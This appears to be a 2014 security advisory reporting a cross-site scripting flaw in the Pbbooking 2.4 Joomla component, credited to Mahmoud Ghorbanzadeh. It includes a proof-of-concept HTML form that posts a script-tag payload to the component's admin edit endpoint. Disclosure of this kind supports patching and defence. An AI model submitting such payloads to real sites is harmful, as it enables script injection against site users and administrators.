Joomla Pbbooking 2.4 Cross Site Scripting

2014.03.16

Credit: Mahmoud Ghorbanzadeh

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Hello,
Cross-site
scripting (XSS) vulnerability in the Pbbooking 2.4 component
for Joomla! allows remote attackers to inject arbitrary web script or HTML via POST request to manage.php.
POC:
<form action="http://site/joomla/administrator/index.php?option=com_pbbooking&controller=manage&task=edit"
method="post">
<input
type="text" name="id" value="1" />
<input
type="text" name="date" value="1" />
<input type="text"
name="xss" value="<script>alert('XSS')</script>"
/>
<input
type="submit" name="submit2" value="Submit" />
</form>
Best regards.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Pbbooking 2.4 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.